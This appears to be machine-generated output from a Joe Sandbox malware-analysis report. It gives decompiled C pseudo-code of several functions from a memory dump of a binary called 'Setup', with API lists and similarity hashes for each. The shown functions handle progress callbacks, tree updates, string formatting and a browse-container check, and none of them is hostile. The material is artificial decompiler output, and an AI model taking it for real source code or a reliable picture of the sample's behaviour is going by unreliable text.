                                                                                                                                                              0x0042f13b
                                                                                                                                                              0x0042f146
                                                                                                                                                              0x0042f14b
                                                                                                                                                              0x0042f14e
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f158
                                                                                                                                                              0x0042f174
                                                                                                                                                              0x0042f174
                                                                                                                                                              0x0042f206
                                                                                                                                                              0x0042f209
                                                                                                                                                              0x0042f213
                                                                                                                                                              0x0042f221
                                                                                                                                                              0x0042f236

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen$_malloc
                                                                                                                                                              • String ID: ?WC$?WC
                                                                                                                                                              • API String ID: 1848352940-3621212526
                                                                                                                                                              • Opcode ID: cb553d21126b40978c9c1d9364a7c44a1aca97ea65b2ab024412406693a42ca8
                                                                                                                                                              • Instruction ID: fe12d40af176b4895fcee0970b276af7f596cbb0b5865be36414c146b9af3522
                                                                                                                                                              • Opcode Fuzzy Hash: cb553d21126b40978c9c1d9364a7c44a1aca97ea65b2ab024412406693a42ca8
                                                                                                                                                              • Instruction Fuzzy Hash: 4F51F6B1E00119DBCB04DFA9D981AEEB7B1FF48304F90812EE815B7341D738AA45CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E004E6B00(intOrPtr __ecx, void* __esi, int _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				char _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				intOrPtr* _v80;
                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                              				signed int _t66;
                                                                                                                                                              				void* _t136;
                                                                                                                                                              				signed int _t137;
                                                                                                                                                              
                                                                                                                                                              				_t136 = __esi;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5062ed);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t66 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t66 ^ _t137);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v76 = __ecx;
                                                                                                                                                              				_v20 = 0x8000ffff;
                                                                                                                                                              				if(E0041D530(_v76 + 0x3c) != 0) {
                                                                                                                                                              					E00439EE0();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_v80 = E0041D530(_v76 + 0x3c);
                                                                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x1c))))(_v80, E00434050( &_v24));
                                                                                                                                                              					if(E0041D530( &_v24) != 0) {
                                                                                                                                                              						if(_a4 == 0xffffffff) {
                                                                                                                                                              							_a4 = 0x64;
                                                                                                                                                              						}
                                                                                                                                                              						E00416A10( &_v56);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E00416A10( &_v72);
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						E00416A10( &_v40);
                                                                                                                                                              						_v8 = 3;
                                                                                                                                                              						do {
                                                                                                                                                              							if(_a4 -  *(_v76 + 0xc) <= 3) {
                                                                                                                                                              								_v84 = _a4 -  *(_v76 + 0xc);
                                                                                                                                                              							} else {
                                                                                                                                                              								_v84 = 3;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_v76 + 0xc) =  *(_v76 + 0xc) + _v84;
                                                                                                                                                              							E00423440( &_v56,  *(_v76 + 0xc));
                                                                                                                                                              							E00423440( &_v72, MulDiv( *(_v76 + 0xc),  *(_v76 + 4), 0x64) +  *((intOrPtr*)(_v76 + 8)));
                                                                                                                                                              							_v20 = E004233F0( &_v24, _t136, L"onNotifyProgress",  &_v56,  &_v72,  &_v40);
                                                                                                                                                              							if( *(_v76 + 0xc) < _a4) {
                                                                                                                                                              								Sleep(0xa);
                                                                                                                                                              							}
                                                                                                                                                              						} while ( *(_v76 + 0xc) < _a4);
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						E00417430( &_v40);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E00417430( &_v72);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E00417430( &_v56);
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00439240();
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return 0;
                                                                                                                                                              			}

















                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000064), ref: 004E6C08
                                                                                                                                                              • Sleep.KERNEL32(0000000A,onNotifyProgress,?,?,?,?), ref: 004E6C46
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: d$onNotifyProgress
                                                                                                                                                              • API String ID: 3472027048-1609401321
                                                                                                                                                              • Opcode ID: 9d87373aa5f0380d0523721526ff7348d815d258d46ac3fcf6cd2fb38ae34b26
                                                                                                                                                              • Instruction ID: a37b9d4cbb157d9b5eae3b3dd72c928394f0c5ab0b1a33107af4011a95fb9640
                                                                                                                                                              • Opcode Fuzzy Hash: 9d87373aa5f0380d0523721526ff7348d815d258d46ac3fcf6cd2fb38ae34b26
                                                                                                                                                              • Instruction Fuzzy Hash: 88515C70900248DFCB04DF99C991AEEFBB5FF14318F24825EE405A7291DB74AE46CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00427B10(char __ecx, void* __eflags, char _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                              				char* _t32;
                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                              				intOrPtr* _t36;
                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                              				intOrPtr* _t47;
                                                                                                                                                              				intOrPtr* _t51;
                                                                                                                                                              				void* _t78;
                                                                                                                                                              				void* _t83;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				void* _t87;
                                                                                                                                                              
                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                              				_t2 =  &_a4; // 0x433644
                                                                                                                                                              				_v8 =  *((intOrPtr*)(E00441910( *_t2)));
                                                                                                                                                              				_t27 = E00415110(_v8);
                                                                                                                                                              				_t5 =  &_a4; // 0x433644
                                                                                                                                                              				 *((intOrPtr*)(E00441910( *_t5))) =  *_t27;
                                                                                                                                                              				_t32 = E004271F0( *((intOrPtr*)(E00415110(_v8))));
                                                                                                                                                              				_t83 = _t78 + 0x14;
                                                                                                                                                              				if( *_t32 == 0) {
                                                                                                                                                              					_t51 = E0042AE30( *((intOrPtr*)(E00415110(_v8))));
                                                                                                                                                              					_t83 = _t83 + 8;
                                                                                                                                                              					_t8 =  &_a4; // 0x433644
                                                                                                                                                              					 *_t51 =  *_t8;
                                                                                                                                                              				}
                                                                                                                                                              				_t9 =  &_a4; // 0x433644
                                                                                                                                                              				_t33 = E0042AE30( *_t9);
                                                                                                                                                              				_t35 = E0042AE30(_v8);
                                                                                                                                                              				_t85 = _t83 + 8;
                                                                                                                                                              				 *_t35 =  *_t33;
                                                                                                                                                              				_t11 =  &_v12; // 0x433644
                                                                                                                                                              				_t36 = E0041D410( *_t11);
                                                                                                                                                              				_t12 =  &_a4; // 0x433644
                                                                                                                                                              				if( *_t12 !=  *_t36) {
                                                                                                                                                              					_t15 =  &_a4; // 0x433644
                                                                                                                                                              					_t39 = E00415110( *((intOrPtr*)(E0042AE30( *_t15))));
                                                                                                                                                              					_t87 = _t85 + 8;
                                                                                                                                                              					_t16 =  &_a4; // 0x433644
                                                                                                                                                              					if( *_t16 !=  *_t39) {
                                                                                                                                                              						_t19 =  &_a4; // 0x433644
                                                                                                                                                              						_t42 = E00441910( *((intOrPtr*)(E0042AE30( *_t19))));
                                                                                                                                                              						_t85 = _t87 + 8;
                                                                                                                                                              						 *_t42 = _v8;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t17 =  &_a4; // 0x433644
                                                                                                                                                              						_t47 = E00415110( *((intOrPtr*)(E0042AE30( *_t17))));
                                                                                                                                                              						_t85 = _t87 + 8;
                                                                                                                                                              						 *_t47 = _v8;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t13 =  &_v12; // 0x433644
                                                                                                                                                              					 *((intOrPtr*)(E0041D410( *_t13))) = _v8;
                                                                                                                                                              				}
                                                                                                                                                              				_t43 = E00415110(_v8);
                                                                                                                                                              				_t22 =  &_a4; // 0x433644
                                                                                                                                                              				 *_t43 =  *_t22;
                                                                                                                                                              				_t23 =  &_a4; // 0x433644
                                                                                                                                                              				_t44 = E0042AE30( *_t23);
                                                                                                                                                              				 *_t44 = _v8;
                                                                                                                                                              				return _t44;
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID: D6C$D6C
                                                                                                                                                              • API String ID: 2519475695-3729970199
                                                                                                                                                              • Opcode ID: 73bab9b323b3af65f751d4bceb1319c06beba5c8193e2e25ad457ea62c87e230
                                                                                                                                                              • Instruction ID: 1e1819cb50db400c064340da7a5e868b9e1a5bb3b7431f14cbdcda3e580f80ba
                                                                                                                                                              • Opcode Fuzzy Hash: 73bab9b323b3af65f751d4bceb1319c06beba5c8193e2e25ad457ea62c87e230
                                                                                                                                                              • Instruction Fuzzy Hash: C44162F9E00114AFDB05EF64E48289E7775AF98308B1444B9F8094B312E639EE51CB96
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004C1FE0(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char* _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                              				char _v37;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				intOrPtr _t51;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                              				void* _t78;
                                                                                                                                                              				signed int _t82;
                                                                                                                                                              				void* _t83;
                                                                                                                                                              				intOrPtr _t84;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x506acb);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t84 = _t83 - 0x18;
                                                                                                                                                              				_push(_t55);
                                                                                                                                                              				_push(_t78);
                                                                                                                                                              				_t39 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t39 ^ _t82);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t84;
                                                                                                                                                              				_t43 = E0044F9A4(_a8);
                                                                                                                                                              				_t85 = _t84 + 4;
                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_v28 =  &_a12;
                                                                                                                                                              					E00453611(0x5c21f0, 0x3e8, _a8, _v28);
                                                                                                                                                              					_t86 = _t85 + 0x10;
                                                                                                                                                              					_v28 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					_t75 = _a4;
                                                                                                                                                              					_t90 =  *((intOrPtr*)(_t75 + 4));
                                                                                                                                                              					if( *((intOrPtr*)(_t75 + 4)) == 0) {
                                                                                                                                                              						_t51 = E0044F76F(_t55, _t78, _t90, 0x20);
                                                                                                                                                              						_t86 = _t86 + 4;
                                                                                                                                                              						_v36 = _t51;
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						if(_v36 == 0) {
                                                                                                                                                              							_v44 = 0;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v44 = E004175C0(E00434050( &_v37));
                                                                                                                                                              						}
                                                                                                                                                              						_v32 = _v44;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						 *((intOrPtr*)(_a4 + 4)) = _v32;
                                                                                                                                                              					}
                                                                                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                              					E004130D0(_v24 + 4, 0x5c21f0);
                                                                                                                                                              					E004130D0(_v24 + 4, 0x5300d0);
                                                                                                                                                              					if( *((intOrPtr*)(_a4 + 8)) != 0xffffffff) {
                                                                                                                                                              						E004C1E80(0x5c21f0, 0x3e8, L"->[%d]\n",  *((intOrPtr*)(_a4 + 8)));
                                                                                                                                                              						__eflags = _v24 + 4;
                                                                                                                                                              						_t43 = E004130D0(_v24 + 4, 0x5c21f0);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t43 = E004130D0(_v24 + 4, 0x5300d4);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t43;
                                                                                                                                                              			}




























                                                                                                                                                              APIs
                                                                                                                                                              • _wcslen.LIBCMT ref: 004C2010
                                                                                                                                                              • _vswprintf_s.LIBCMT ref: 004C203F
                                                                                                                                                                • Part of subcall function 00453611: __vsnwprintf_l.LIBCMT ref: 00453624
                                                                                                                                                                • Part of subcall function 0044F76F: _malloc.LIBCMT ref: 0044F789
                                                                                                                                                              • _swprintf.LIBCMTD ref: 004C212F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __vsnwprintf_l_malloc_swprintf_vswprintf_s_wcslen
                                                                                                                                                              • String ID: ->[%d]
                                                                                                                                                              • API String ID: 919113508-1967647186
                                                                                                                                                              • Opcode ID: 3cf0d23f4590347f0f25dd8f71b9a34a9668a45c691074d73b9181e1dd036ae7
                                                                                                                                                              • Instruction ID: e3a414589ff9bb562630220d31cb12d6e02212e954a4a91c085afea6a517ee55
                                                                                                                                                              • Opcode Fuzzy Hash: 3cf0d23f4590347f0f25dd8f71b9a34a9668a45c691074d73b9181e1dd036ae7
                                                                                                                                                              • Instruction Fuzzy Hash: D9417374A00209AFDB14DF89C955FEEBBB4FB04314F14421EE915673C1D7B4AA41CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004F2770(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				intOrPtr* _v48;
                                                                                                                                                              				signed int _t26;
                                                                                                                                                              				char _t32;
                                                                                                                                                              				signed char _t35;
                                                                                                                                                              				signed int _t69;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50f626);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t26 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t26 ^ _t69);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v48 = __ecx;
                                                                                                                                                              				if((E00404920(E00404820()) & 0x000000ff) != 0 || ( *0x5bdd29 & 0x000000ff) != 0) {
                                                                                                                                                              					L7:
                                                                                                                                                              					_t32 = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					E00414C90();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t35 = E004F06E0(_v48, L"brwseCntnr", E00434050( &_v20));
                                                                                                                                                              					_t75 = _t35 & 0x000000ff;
                                                                                                                                                              					if((_t35 & 0x000000ff) == 0) {
                                                                                                                                                              						L6:
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E0040D320();
                                                                                                                                                              						goto L7;
                                                                                                                                                              					} else {
                                                                                                                                                              						E00416A10( &_v40);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x80))))(_v48, L"getBrowse", 0, 0,  &_v40);
                                                                                                                                                              						if((E004D9EF0(__ebx, E00404820(), _v32, __edi, __esi, _t75, __fp0, _v32) & 0x000000ff) != 0) {
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							E00417430( &_v40);
                                                                                                                                                              							goto L6;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v41 = 0;
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							E00417430( &_v40);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E0040D320();
                                                                                                                                                              							_t32 = _v41;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t32;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F2798
                                                                                                                                                                • Part of subcall function 00416A10: VariantInit.OLEAUT32(4<O), ref: 00416A1B
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F2818
                                                                                                                                                                • Part of subcall function 004D9EF0: _Immortalize.LIBCPMTD ref: 004D9F39
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$InitVariant
                                                                                                                                                              • String ID: brwseCntnr$getBrowse
                                                                                                                                                              • API String ID: 2111759460-262030208
                                                                                                                                                              • Opcode ID: c52fb5ae1b5af3db22209827fb280a0f0815b1db6de82ece67e65c2be40546e1
                                                                                                                                                              • Instruction ID: 4fa7eccefb8ea2d50809eb1b252eb4b554dd85de9e3476904be64cfb06904a21
                                                                                                                                                              • Opcode Fuzzy Hash: c52fb5ae1b5af3db22209827fb280a0f0815b1db6de82ece67e65c2be40546e1
                                                                                                                                                              • Instruction Fuzzy Hash: 8031D570D001489BCB04EBA6D952BFEBBB4AF54304F50866EE511BB2D1DB785E04CBA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0041F420(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v49;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
                                                                                                                                                              				_v12 =  *((intOrPtr*)(_v56 + 4));
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t66 = E00420160(_v16);
                                                                                                                                                              					_t143 = _t142 + 4;
                                                                                                                                                              					_t149 =  *_t66;
                                                                                                                                                              					if( *_t66 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v16;
                                                                                                                                                              					_t95 = E00436060(_t149, _v16);
                                                                                                                                                              					_t96 = E00415110(_a8);
                                                                                                                                                              					_t147 = _t143 + 8;
                                                                                                                                                              					_v5 = E00420AA0(_v56, _t96, _t95);
                                                                                                                                                              					if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                              						_t98 = E00441910(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t98;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t101 = E00415110(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t101;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v60;
                                                                                                                                                              				}
                                                                                                                                                              				__eflags = 0;
                                                                                                                                                              				if(0 == 0) {
                                                                                                                                                              					E00445360( &_v20, _v12);
                                                                                                                                                              					__eflags = _v5 & 0x000000ff;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							E00420AC0( &_v20);
                                                                                                                                                              							L13:
                                                                                                                                                              							_t72 = E00415110(_a8);
                                                                                                                                                              							__eflags = E00420AA0(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v49 = 0;
                                                                                                                                                              								E00445E50(_a4,  &_v20,  &_v49);
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v41 = 1;
                                                                                                                                                              							E00445E50(_a4, E00420290(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
                                                                                                                                                              							return _a4;
                                                                                                                                                              						}
                                                                                                                                                              						_v33 = 1;
                                                                                                                                                              						E00445E50(_a4, E00420290(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
                                                                                                                                                              						return _a4;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_v21 = 1;
                                                                                                                                                              				E00445E50(_a4, E00420290(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 674a9958b9a5c9a5cb453f160200f63fe660729ab341863490913925c6397475
